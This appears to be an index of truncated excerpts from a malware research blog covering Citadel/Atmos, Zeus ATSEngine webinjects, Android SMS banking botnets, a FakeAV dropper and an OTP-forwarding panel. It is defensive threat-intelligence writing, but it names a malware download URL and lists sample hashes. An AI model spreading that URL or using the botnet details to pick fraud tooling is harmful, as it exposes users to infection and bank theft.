Guys of JPCERT, 有難う御座います！ Released an update to their Citadel decrypter to make it compatible with 0.0.1.1 sample. Citadel 0.0.1.1 don't have a lot of documentation, so time as come to talk about it. Personally i know this malware under the name 'Atmos' (be ready for name war in 3,2,1...)   The first sample i was aware is the one spotted by tilldenis...

This install service was running since a long time but the server recently died. People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan. Login: Statistics by days: (Date, Unique visits, General visits) Statistics by countries: (Countries, Unique visits, Percentage, General visits) Statistics by version: (Version, Unique visits,...

ATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots. It's the main difference with this, and a standard web inject inside Zeus. One just allows you to do a static change in the page...

Another Android botnet dumped recently. This malware can send and intercept sms from bots. Like most of android botnets, they are used mainly to target mobile banks like Sberbank (www.sberbank.ru - the biggest bank in Russia) In Russia, you can transfer money from one card to another card through mobile sms This botnet is sold 120$ Fake App: MD5:...

I've found a sample yesterday downloaded via this url: skyways.co/play.exe, console application, and ugly code + scareware and third party FakeAV call center. All the following was so lame that i need to talk about this.  At first the malware will try to see if he's dropped into %SYSTEMROOT%/system/ If it's not the case then he will create a file:...

OTP forwarder dumped months ago. Login: Statistics: Bots: Bot: Passwords: Send a command: Commands sent: Apps: Apps builder: MD5s: 2d4770137ae0b91446fc2f99d9fdb2b0 f629adcfbcdd4622ad75337ec0b1a0ff dd4ac55df6500352dd2cad340a36a40f b9f9614775a54aa42f94eedbc4796446 1fababfd02ea09ae924cd0a7dbfb708c bc8394bc9c6adbcfca3d450ee4ede44a 1cb87e1716c503bf499e529ee90e5b31...